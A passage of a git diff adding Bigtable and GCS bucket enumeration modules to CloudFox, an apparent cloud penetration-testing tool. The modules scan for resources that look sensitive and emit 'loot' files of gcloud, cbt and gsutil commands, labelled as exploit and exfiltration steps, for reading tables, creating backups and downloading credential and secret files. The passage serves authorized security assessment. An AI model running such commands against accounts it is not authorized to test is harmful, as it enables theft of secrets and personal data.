lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BIGTABLE INSTANCE: %s\n"+ + "# =============================================================================\n"+ + "# Display Name: %s\n"+ + "# Type: %s, State: %s\n"+ + "# Clusters: %s\n", + instance.Name, instance.DisplayName, + instance.Type, instance.State, + strings.Join(clusterNames, ", "), + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe instance: +gcloud bigtable instances describe %s --project=%s + +# List clusters in instance: +gcloud bigtable clusters list --instances=%s --project=%s + +# List tables (gcloud): +gcloud bigtable instances tables list --instances=%s --project=%s + +# List tables (cbt): +cbt -project %s -instance %s ls + +# Get instance IAM policy: +gcloud bigtable instances get-iam-policy %s --project=%s + +# List app profiles: +gcloud bigtable instances app-profiles list --instance=%s --project=%s + +# === EXPLOIT COMMANDS === + +# List all tables in the instance: +cbt -project %s -instance %s ls +# (See per-table commands below for specific read/lookup/dump commands) + +`, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.ProjectID, instance.Name, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.ProjectID, instance.Name, + ) + + // Add backup command with actual cluster name if available + if len(clusterNames) > 0 { + lootFile.Contents += fmt.Sprintf( + "# Create a backup (for exfiltration) - replace TABLE_NAME with actual table:\n"+ + "gcloud bigtable backups create cloudfox-backup --instance=%s --cluster=%s --table=TABLE_NAME --expiration-date=$(date -u -d '+7 days' '+%%Y-%%m-%%dT%%H:%%M:%%SZ') --project=%s --async\n\n", + instance.Name, clusterNames[0], instance.ProjectID, + ) + } +} + +func (m *BigtableModule) addTableToLoot(projectID string, table bigtableservice.BigtableTableInfo) { + lootFile := m.LootMap[projectID]["bigtable-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# TABLE: %s (Instance: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Read first 10 rows:\n"+ + "cbt -project %s -instance %s read %s count=10\n"+ + "# Get table IAM policy:\n"+ + "gcloud bigtable instances tables get-iam-policy %s --instance=%s --project=%s\n"+ + "# Describe table (column families):\n"+ + "cbt -project %s -instance %s ls %s\n\n", + table.Name, table.InstanceName, + table.ProjectID, table.InstanceName, table.Name, + table.Name, table.InstanceName, table.ProjectID, + table.ProjectID, table.InstanceName, table.Name, + ) +} + +func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BigtableModule) getInstanceHeader() []string { + return []string{"Project", "Instance", "Display Name", "Type", "State", "Clusters", "IAM Binding Role", "IAM Binding Principal", "Public"} +} + +func (m *BigtableModule) getTableHeader() []string { + return []string{"Project", "Instance", "Table", "IAM Binding Role", "IAM Binding Principal", "Public"} +} + +func (m *BigtableModule) instancesToTableBody(instances []bigtableservice.BigtableInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + publicAccess := "No" + if instance.PublicAccess { + publicAccess = "Yes" + } + + var clusterDetails []string + for _, cluster := range instance.Clusters { + clusterDetails = append(clusterDetails, fmt.Sprintf("%s (%s)", cluster.Name, cluster.Location)) + } + clusters := "-" + if len(clusterDetails) > 0 { + clusters = strings.Join(clusterDetails, ", ") + } + + if len(instance.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range instance.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BigtableModule) tablesToTableBody(tables []bigtableservice.BigtableTableInfo) [][]string { + var body [][]string + for _, table := range tables { + publicAccess := "No" + if table.PublicAccess { + publicAccess = "Yes" + } + + if len(table.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(table.ProjectID), + table.InstanceName, + table.Name, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(table.ProjectID), + table.InstanceName, + table.Name, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BigtableModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if tables, ok := m.ProjectTables[projectID]; ok && len(tables) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-tables", + Header: m.getTableHeader(), + Body: m.tablesToTableBody(tables), + }) + } + + return tableFiles +} + +func (m *BigtableModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectInstances { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigtableOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGTABLE_MODULE_NAME) + } +} + +func (m *BigtableModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allTables := m.getAllTables() + + var tableFiles []internal.TableFile + + if len(allInstances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + if len(allTables) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-tables", + Header: m.getTableHeader(), + Body: m.tablesToTableBody(allTables), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BigtableOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGTABLE_MODULE_NAME) + } +} diff --git a/gcp/commands/bigtableenum.go b/gcp/commands/bigtableenum.go new file mode 100644 index 00000000..a8cac26e --- /dev/null +++ b/gcp/commands/bigtableenum.go @@ -0,0 +1,253 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + bigtableenumservice "github.com/BishopFox/cloudfox/gcp/services/bigtableEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBigtableEnumCommand = &cobra.Command{ + Use: globals.GCP_BIGTABLEENUM_MODULE_NAME, + Aliases: []string{"bt-enum", "bt-scan"}, + Short: "Scan Bigtable instances, tables, and column families for sensitive data indicators", + Long: `Scan Bigtable metadata for potentially sensitive data. + +Scans instance names, table names, and column family names against sensitive +data patterns (credentials, PII, financial, compliance keywords). + +Detects resources with names suggesting they store: +- Credentials, tokens, or secrets +- PII (SSN, credit cards) +- Financial data (payments, billing, salary) +- Compliance-labeled data (HIPAA, GDPR, PII)`, + Run: runGCPBigtableEnumCommand, +} + +type BigtableEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]bigtableenumservice.SensitiveBTResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +type BigtableEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigtableEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigtableEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigtableEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGTABLEENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BigtableEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]bigtableenumservice.SensitiveBTResource), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigtableEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Scanning Bigtable resources for sensitive data indicators...", globals.GCP_BIGTABLEENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGTABLEENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive Bigtable resources found", globals.GCP_BIGTABLEENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive Bigtable resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), globals.GCP_BIGTABLEENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *BigtableEnumModule) getAllResources() []bigtableenumservice.SensitiveBTResource { + var all []bigtableenumservice.SensitiveBTResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *BigtableEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning Bigtable in project: %s", projectID), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } + + svc := bigtableenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLEENUM_MODULE_NAME, + fmt.Sprintf("Could not scan Bigtable in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "bigtable-enum-commands", + Contents: "# Bigtable Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s/%s\n# %s\ncbt -project %s -instance %s read %s count=10\n\n", + r.RiskLevel, r.Category, r.Instance, r.Table, + r.Description, + projectID, r.Instance, r.Table, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - instance: %s\n# %s\ncbt -project %s -instance %s ls\n\n", + r.RiskLevel, r.Category, r.Instance, + r.Description, + projectID, r.Instance, + ) + } + } + m.LootMap[projectID]["bigtable-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *BigtableEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeBigtableHierarchicalOutput(ctx, logger) + } else { + m.writeBigtableFlatOutput(ctx, logger) + } +} + +func (m *BigtableEnumModule) getHeader() []string { + return []string{"Project", "Instance", "Table", "Column Family", "Category", "Risk Level", "Description"} +} + +func (m *BigtableEnumModule) resourcesToTableBody(resources []bigtableenumservice.SensitiveBTResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Instance, + r.Table, + r.ColumnFamily, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *BigtableEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "bigtable-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *BigtableEnumModule) writeBigtableHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigtableEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } +} + +func (m *BigtableEnumModule) writeBigtableFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "bigtable-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BigtableEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go new file mode 100644 index 00000000..7bc9e505 --- /dev/null +++ b/gcp/commands/bucketenum.go @@ -0,0 +1,617 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bucketenumservice "github.com/BishopFox/cloudfox/gcp/services/bucketEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + bucketEnumMaxObjects int + bucketEnumAllObjects bool + bucketEnumNoLimit bool + maxObjectsWasSet bool // tracks if --max-objects was explicitly set +) + +var GCPStorageEnumCommand = &cobra.Command{ + Use: globals.GCP_STORAGEENUM_MODULE_NAME, + Aliases: []string{"bucket-enum", "bucket-scan", "gcs-enum", "sensitive-files"}, + Short: "Enumerate GCS buckets for sensitive files (credentials, secrets, configs)", + Long: `Enumerate GCS buckets to find potentially sensitive files. + +This module scans bucket contents for files that may contain: +- Credentials (service account keys, SSH keys, certificates) +- Secrets (environment files, API keys, tokens) +- Configuration files (may contain hardcoded secrets) +- Database backups +- Terraform state files +- Source code/git repositories + +File categories detected: +- Credential: .json keys, .pem, .key, .p12, SSH keys +- Secret: .env, passwords, API keys, tokens +- Config: YAML, properties, settings files +- Backup: SQL dumps, archives +- Source: Git repositories +- Cloud: Cloud Functions source, build artifacts + +Flags: + --all-objects Report ALL bucket objects (not just sensitive files) + --no-limit Remove the 1000 object-per-bucket scan limit + --max-objects Set a custom object-per-bucket scan limit + +By default, only sensitive files are reported with a 1000 object scan limit. +WARNING: --all-objects and --no-limit may take a long time for large buckets.`, + Run: runGCPStorageEnumCommand, +} + +func init() { + GCPStorageEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket") + GCPStorageEnumCommand.Flags().BoolVar(&bucketEnumAllObjects, "all-objects", false, "Report ALL objects, not just sensitive files (implies --no-limit unless --max-objects is set)") + GCPStorageEnumCommand.Flags().BoolVar(&bucketEnumNoLimit, "no-limit", false, "Remove the 1000 object-per-bucket scan limit (still only reports sensitive files)") +} + +type BucketEnumModule struct { + gcpinternal.BaseGCPModule + ProjectSensitiveFiles map[string][]bucketenumservice.SensitiveFileInfo // projectID -> files + ProjectAllObjects map[string][]bucketenumservice.ObjectInfo // projectID -> all objects (when --all-objects) + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + EnumerateAll bool // whether to enumerate all objects + MaxObjects int // max objects per bucket (0 = unlimited) + mu sync.Mutex +} + +type BucketEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BucketEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPStorageEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGEENUM_MODULE_NAME) + if err != nil { + return + } + + // Determine effective max objects limit + effectiveMaxObjects := bucketEnumMaxObjects + maxObjectsExplicitlySet := cmd.Flags().Changed("max-objects") + + // --no-limit flag sets unlimited + if bucketEnumNoLimit { + effectiveMaxObjects = 0 + } + + // --all-objects implies no limit UNLESS --max-objects was explicitly set + if bucketEnumAllObjects && !maxObjectsExplicitlySet { + effectiveMaxObjects = 0 + } + + module := &BucketEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSensitiveFiles: make(map[string][]bucketenumservice.SensitiveFileInfo), + ProjectAllObjects: make(map[string][]bucketenumservice.ObjectInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + EnumerateAll: bucketEnumAllObjects, + MaxObjects: effectiveMaxObjects, + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) { + maxMsg := fmt.Sprintf("%d", m.MaxObjects) + if m.MaxObjects == 0 { + maxMsg = "unlimited" + } + + if m.EnumerateAll { + logger.InfoM(fmt.Sprintf("Enumerating ALL bucket contents (%s objects per bucket)...", maxMsg), globals.GCP_STORAGEENUM_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (%s objects per bucket)...", maxMsg), globals.GCP_STORAGEENUM_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGEENUM_MODULE_NAME, m.processProject) + + if m.EnumerateAll { + // Full enumeration mode + allObjects := m.getAllObjects() + if len(allObjects) == 0 { + logger.InfoM("No objects found in buckets", globals.GCP_STORAGEENUM_MODULE_NAME) + return + } + + // Count public objects + publicCount := 0 + for _, obj := range allObjects { + if obj.IsPublic { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d object(s) across all buckets (%d public)", + len(allObjects), publicCount), globals.GCP_STORAGEENUM_MODULE_NAME) + } else { + // Sensitive files mode + allFiles := m.getAllSensitiveFiles() + if len(allFiles) == 0 { + logger.InfoM("No sensitive files found", globals.GCP_STORAGEENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, file := range allFiles { + switch file.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", + len(allFiles), criticalCount, highCount), globals.GCP_STORAGEENUM_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BucketEnumModule) getAllObjects() []bucketenumservice.ObjectInfo { + var all []bucketenumservice.ObjectInfo + for _, objects := range m.ProjectAllObjects { + all = append(all, objects...) + } + return all +} + +func (m *BucketEnumModule) getAllSensitiveFiles() []bucketenumservice.SensitiveFileInfo { + var all []bucketenumservice.SensitiveFileInfo + for _, files := range m.ProjectSensitiveFiles { + all = append(all, files...) + } + return all +} + +func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning buckets in project: %s", projectID), globals.GCP_STORAGEENUM_MODULE_NAME) + } + + svc := bucketenumservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + if m.EnumerateAll { + m.LootMap[projectID]["storage-enum-all-commands"] = &internal.LootFile{ + Name: "storage-enum-all-commands", + Contents: "# GCS Download Commands for All Objects\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } else { + m.LootMap[projectID]["storage-enum-sensitive-commands"] = &internal.LootFile{ + Name: "storage-enum-sensitive-commands", + Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["storage-enum-commands"] = &internal.LootFile{ + Name: "storage-enum-commands", + Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + } + m.mu.Unlock() + + // Get list of buckets + buckets, err := svc.GetBucketsList(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) + return + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_STORAGEENUM_MODULE_NAME) + } + + if m.EnumerateAll { + // Enumerate ALL objects in each bucket + var projectObjects []bucketenumservice.ObjectInfo + for _, bucketName := range buckets { + objects, err := svc.EnumerateAllBucketObjects(bucketName, projectID, m.MaxObjects) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, + fmt.Sprintf("Could not enumerate bucket %s in project %s", bucketName, projectID)) + continue + } + projectObjects = append(projectObjects, objects...) + } + + m.mu.Lock() + m.ProjectAllObjects[projectID] = projectObjects + // Group objects by bucket and add bucket-level headers + currentBucket := "" + for _, obj := range projectObjects { + if obj.BucketName != currentBucket { + currentBucket = obj.BucketName + if lootFile := m.LootMap[projectID]["storage-enum-all-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n\n", + currentBucket, + ) + } + } + m.addObjectToLoot(projectID, obj) + } + m.mu.Unlock() + } else { + // Scan for sensitive files only + var projectFiles []bucketenumservice.SensitiveFileInfo + for _, bucketName := range buckets { + files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, m.MaxObjects) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, + fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) + continue + } + projectFiles = append(projectFiles, files...) + } + + m.mu.Lock() + m.ProjectSensitiveFiles[projectID] = projectFiles + // Group files by bucket and add bucket-level headers + currentBucket := "" + for _, file := range projectFiles { + if file.BucketName != currentBucket { + currentBucket = file.BucketName + for _, lootName := range []string{"storage-enum-commands", "storage-enum-sensitive-commands"} { + if lootFile := m.LootMap[projectID][lootName]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n\n", + currentBucket, + ) + } + } + } + m.addFileToLoot(projectID, file) + } + m.mu.Unlock() + } +} + +func (m *BucketEnumModule) addObjectToLoot(projectID string, obj bucketenumservice.ObjectInfo) { + if lootFile := m.LootMap[projectID]["storage-enum-all-commands"]; lootFile != nil { + publicMarker := "" + if obj.IsPublic { + publicMarker = " [PUBLIC]" + } + // Build local directory path: bucket/BUCKETNAME/OBJECTPATH/ + localDir := fmt.Sprintf("bucket/%s/%s", obj.BucketName, getObjectDir(obj.ObjectName)) + localCpCmd := fmt.Sprintf("gsutil cp gs://%s/%s %s", obj.BucketName, obj.ObjectName, localDir) + lootFile.Contents += fmt.Sprintf( + "# gs://%s/%s%s\n"+ + "# Size: %d bytes, Type: %s\n"+ + "mkdir -p %s\n"+ + "%s\n\n", + obj.BucketName, obj.ObjectName, publicMarker, + obj.Size, obj.ContentType, + localDir, + localCpCmd, + ) + } +} + +func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservice.SensitiveFileInfo) { + // Build local directory path: bucket/BUCKETNAME/OBJECTPATH/ + localDir := fmt.Sprintf("bucket/%s/%s", file.BucketName, getObjectDir(file.ObjectName)) + localCpCmd := fmt.Sprintf("gsutil cp gs://%s/%s %s", file.BucketName, file.ObjectName, localDir) + + // All files go to the general commands file (without risk ranking) + if lootFile := m.LootMap[projectID]["storage-enum-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# %s - gs://%s/%s\n"+ + "# %s, Size: %d bytes\n"+ + "mkdir -p %s\n"+ + "%s\n\n", + file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + localDir, + localCpCmd, + ) + } + + // CRITICAL and HIGH risk files also go to the sensitive commands file + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + if lootFile := m.LootMap[projectID]["storage-enum-sensitive-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "mkdir -p %s\n"+ + "%s\n\n", + file.RiskLevel, file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + localDir, + localCpCmd, + ) + } + } +} + +func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BucketEnumModule) getFilesHeader() []string { + return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public", "Encryption", "Description"} +} + +func (m *BucketEnumModule) getSensitiveFilesHeader() []string { + return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public", "Encryption"} +} + +func (m *BucketEnumModule) getAllObjectsHeader() []string { + return []string{"Project", "Bucket", "Object Name", "Content Type", "Size", "Public", "Encryption", "Updated"} +} + +func (m *BucketEnumModule) filesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { + var body [][]string + for _, file := range files { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + body = append(body, []string{ + m.GetProjectName(file.ProjectID), + file.BucketName, + file.ObjectName, + file.Category, + formatFileSize(file.Size), + publicStatus, + file.Encryption, + file.Description, + }) + } + return body +} + +func (m *BucketEnumModule) sensitiveFilesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { + var body [][]string + for _, file := range files { + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + body = append(body, []string{ + m.GetProjectName(file.ProjectID), + file.BucketName, + file.ObjectName, + file.Category, + formatFileSize(file.Size), + publicStatus, + file.Encryption, + }) + } + } + return body +} + +func (m *BucketEnumModule) allObjectsToTableBody(objects []bucketenumservice.ObjectInfo) [][]string { + var body [][]string + for _, obj := range objects { + publicStatus := "No" + if obj.IsPublic { + publicStatus = "Yes" + } + body = append(body, []string{ + m.GetProjectName(obj.ProjectID), + obj.BucketName, + obj.ObjectName, + obj.ContentType, + formatFileSize(obj.Size), + publicStatus, + obj.Encryption, + obj.Updated, + }) + } + return body +} + +func (m *BucketEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if m.EnumerateAll { + // Full enumeration mode + objects := m.ProjectAllObjects[projectID] + if len(objects) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "storage-enum-all", + Header: m.getAllObjectsHeader(), + Body: m.allObjectsToTableBody(objects), + }) + } + } else { + // Sensitive files mode + files := m.ProjectSensitiveFiles[projectID] + if len(files) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "storage-enum", + Header: m.getFilesHeader(), + Body: m.filesToTableBody(files), + }) + + sensitiveBody := m.sensitiveFilesToTableBody(files) + if len(sensitiveBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "storage-enum-sensitive", + Header: m.getSensitiveFilesHeader(), + Body: sensitiveBody, + }) + } + } + } + + return tableFiles +} + +func (m *BucketEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get the appropriate project map based on mode + var projectIDs []string + if m.EnumerateAll { + for projectID := range m.ProjectAllObjects { + projectIDs = append(projectIDs, projectID) + } + } else { + for projectID := range m.ProjectSensitiveFiles { + projectIDs = append(projectIDs, projectID) + } + } + + for _, projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + 